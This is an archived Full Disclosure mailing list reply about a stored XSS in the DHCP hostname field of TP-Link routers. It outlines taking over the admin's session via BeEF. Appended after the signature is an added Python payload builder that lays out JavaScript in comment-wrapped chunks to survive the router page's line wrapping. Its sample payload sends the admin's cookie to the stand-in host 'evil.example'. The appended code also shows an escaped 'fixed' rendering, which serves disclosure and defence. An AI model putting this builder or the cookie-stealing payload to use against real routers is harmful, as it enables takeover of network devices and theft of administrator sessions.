Message-Id: <EBCAA892-4017-4783-A15F-40D0462A37FE@surevine.com>
Date: Mon, 28 Nov 2016 14:42:57 +0000
From: "Simon Waters (Surevine)" <simon.waters@...evine.com>
To: Vulnerability Lab <research@...nerability-lab.com>
Cc: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>, support.uk@...link.com
Subject: Re: [FD] Tenda, Dlink & Tplink TD-W8961ND - DHCP XSS Vulnerability
XSS in DHCP name has been reported on the Full Disclosure mailing list for other models of TP-Link Router before.
Seems to be generic to many TP-Link models.
My model applies a regular line wrap to the DHCP hostname field, so you need to insert an HTML or JS comment into any exploit code every N characters, but it is fully exploitable, and you can write arbitrary JS in that space with a little effort.
The attacker would have to inject JavaScript as a DHCP hostname, exhaust the DHCP pool to encourage the admin to view the DHCP page, at which point the attacker would take control of the admin’s browser and current session using a tool such as BeEF XSS.
So anyone who can get a DHCP lease from a TP-Link router can use this to obtain a reasonable chance of acquiring admin privileges on that router.
That TP-Link continue to sell routers with basic security vulnerabilities like these is unimpressive, and there doesn’t seem to be an effective support channel to get these issues fixed, or updates released.
Simon Waters
phone +448454681066
email simon.waters@...evine.com <mailto:simon.waters@...evine.com>
skype simon.waters.surevine <skype://simon.waters.surevine>
Participate | Collaborate | Innovate
Surevine Limited, registered in England and Wales with number 06726289. Mailing Address : PO Box 1136, Guildford GU1 9ND
If you think you have received this message in error, please notify us.
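Added example, not part of the message above or of any TP-Link code: a payload builder for the situation Simon describes, where the admin page reflects the DHCP hostname unescaped but forces a line break every N characters, so the JavaScript has to be laid out so that every break lands inside a /* */ comment. The wrap width (32), the use of "<br>" as the inserted break, the <script> wrapper, the sample JavaScript and the simulated router page are all assumptions made here for illustration; the DHCP option 12 length limit of 255 bytes is from the protocol. The router_render_fixed function shows the escaping the page should have applied.

```python
import html
import re

# Added example (not from the post): a payload builder for the situation the
# post describes, where the admin page reflects the DHCP hostname unescaped
# but inserts a line break every N characters. The wrap width, the "<br>"
# used for the break, the <script> wrapper and the sample JavaScript are all
# assumptions made here for illustration.

WRAP_EVERY = 32          # assumed "N" of the forced line wrap
DHCP_HOSTNAME_MAX = 255  # DHCP option 12 (host name) has a one-byte length

# Minimal JavaScript tokenizer: string literals, identifiers, numbers, the
# common multi-character operators, then any single non-space character.
# A /* */ comment may sit between any two of these tokens without changing
# the program's meaning (line comments and regex literals are not handled).
_TOKEN = re.compile(
    r"""'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*"|[A-Za-z_$][\w$]*|\d+"""
    r"""|===|!==|[=!<>]=|\+\+|--|&&|\|\||=>|\S"""
)
_WORD = re.compile(r"[\w$]")


def tokenize(js):
    return _TOKEN.findall(js)


def _glue(current, tok):
    """A space is needed only where two word-like tokens would otherwise fuse."""
    if current and _WORD.match(current[-1]) and _WORD.match(tok[0]):
        return " "
    return ""


def comment_wrap(js, n=WRAP_EVERY, prefix="<script>", suffix="</script>"):
    """Lay prefix + js + suffix out in n-character chunks so that every wrap
    boundary (offsets n, 2n, ...) falls inside a /* ... */ comment.

    Each chunk except the last ends with "/*" plus filler, and each chunk
    except the first begins with "*/", so whatever the page inserts at the
    boundary becomes comment text. Inside a <script> element a "<br>" is
    script data, not markup, so the browser still runs the joined code.
    """
    tokens = tokenize(js) + [suffix]
    chunks = []
    lead = ""          # "*/" for every chunk after the first
    current = prefix   # code placed in the chunk being filled
    for tok in tokens:
        if len(tok) > n - 4:
            raise ValueError("token %r cannot fit in a %d-character chunk" % (tok, n))
        room = n - len(lead) - 2          # keep two characters for the "/*"
        piece = _glue(current, tok) + tok
        if len(current) + len(piece) > room:
            chunk = lead + current + "/*"
            chunks.append(chunk + "A" * (n - len(chunk)))  # filler is comment text
            lead, current, piece = "*/", "", tok
        current += piece
    chunks.append(lead + current)         # last chunk needs no trailing comment
    payload = "".join(chunks)
    if len(payload) > DHCP_HOSTNAME_MAX:
        raise ValueError("payload does not fit in the DHCP host name option")
    return payload


def fits(js, n):
    """True if comment_wrap can lay js out at wrap width n."""
    try:
        comment_wrap(js, n)
        return True
    except ValueError:
        return False


def router_render_vulnerable(hostname, n=WRAP_EVERY):
    """Assumed behaviour of the affected page: the raw hostname is written
    into the HTML with a <br> inserted every n characters."""
    return "<br>".join(hostname[i:i + n] for i in range(0, len(hostname), n))


def router_render_fixed(hostname, n=WRAP_EVERY):
    """Same layout, but each chunk is HTML-escaped first, so the hostname can
    only ever render as text."""
    chunks = (hostname[i:i + n] for i in range(0, len(hostname), n))
    return "<br>".join(html.escape(c, quote=True) for c in chunks)


def strip_block_comments(s):
    return re.sub(r"/\*.*?\*/", "", s, flags=re.S)


def survives_wrap(payload, js, n=WRAP_EVERY, prefix="<script>", suffix="</script>"):
    """True if, after the page's wrapping, the script element still carries
    exactly the intended tokens once the comments are discarded."""
    rendered = strip_block_comments(router_render_vulnerable(payload, n))
    if not (rendered.startswith(prefix) and rendered.endswith(suffix)):
        return False
    body = rendered[len(prefix):len(rendered) - len(suffix)]
    return tokenize(body) == tokenize(js)


# Constructed sample: a beacon that sends the admin's cookie to an attacker host.
SAMPLE_JS = "new Image().src='//evil.example/?'+document.cookie"

if __name__ == "__main__":
    payload = comment_wrap(SAMPLE_JS)
    print(payload)
    print(router_render_vulnerable(payload))
    print(router_render_fixed(payload))
```

The builder only places comments between tokens, so a single token longer than N-4 characters (a long string literal, say) cannot be wrapped and is rejected rather than silently broken; a real payload would split such strings with concatenation. The naive payload without the comments fails survives_wrap because the break lands mid-literal, which is the "little effort" the message refers to.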
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/